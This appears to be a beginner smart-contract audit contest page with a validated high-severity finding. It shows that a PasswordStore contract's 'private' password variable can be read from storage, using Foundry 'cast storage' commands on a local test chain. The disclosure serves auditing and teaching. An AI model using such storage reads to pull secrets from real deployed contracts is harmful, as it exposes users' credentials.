First Flight #1: PasswordStore

First Flight #1

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

`s_password` state variables value can be read from the storage slot.

alymurtazamemon

Summary

Never store passwords on-chain because state variable values are readable from storage slots, regardless of whether the state variable's visibility is set to private.

Vulnerability Details

string private s_password;

PasswordStore.sol - Line 14

The s_password state variable's visibility is set to private with the assumption that it won't be visible to other users. In Solidity, private doesn't prevent the reading of its value; it only makes it private for other smart contracts, which cannot access this state variable. However, users off-chain can easily read its value from the smart contract's storage slot.

POC

Follow the steps:

Run the local anvil node using the command make anvil.
Deploy the smart contract on the local anvil chain using the command make deploy. This will deploy the PasswordStore smart contract and set the new password.
Grab the deployed smart contract address from the terminal where you deployed the smart contract. In my case it is 0x5FbDB2315678afecb367f032d93F642f64180aa3
Read the storage value of this deployed smart contract using the foundry's cast command. Command: cast storage <contract-address> <storage-slot>. In my case it is cast storage 0x5FbDB2315678afecb367f032d93F642f64180aa3 1 (1 because on the slot 0, owner address is stored and on the slot 1 password).
Result: 0x6d7950617373776f726400000000000000000000000000000000000000000014 (string value in bytes form).
Convert back to string form using the command cast parse-bytes32-string <bytes value>. In my case it is cast parse-bytes32-string "0x6d7950617373776f726400000000000000000000000000000000000000000014".
Result: "myPassword"

We have seen that anyone can read the smart contract's private state variables values from the storage slots.

Impact

The attacker will have access to the password, which can be used to exploit areas where the owner utilizes this password. Based on the user's password pattern, the attacker can also predict passwords for the owner's other platforms.

Tools Used

Manual Review

Recommendations

Never store passwords on-chain.

Updates

Lead Judging Commences

inallhonesty Lead Judge about 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!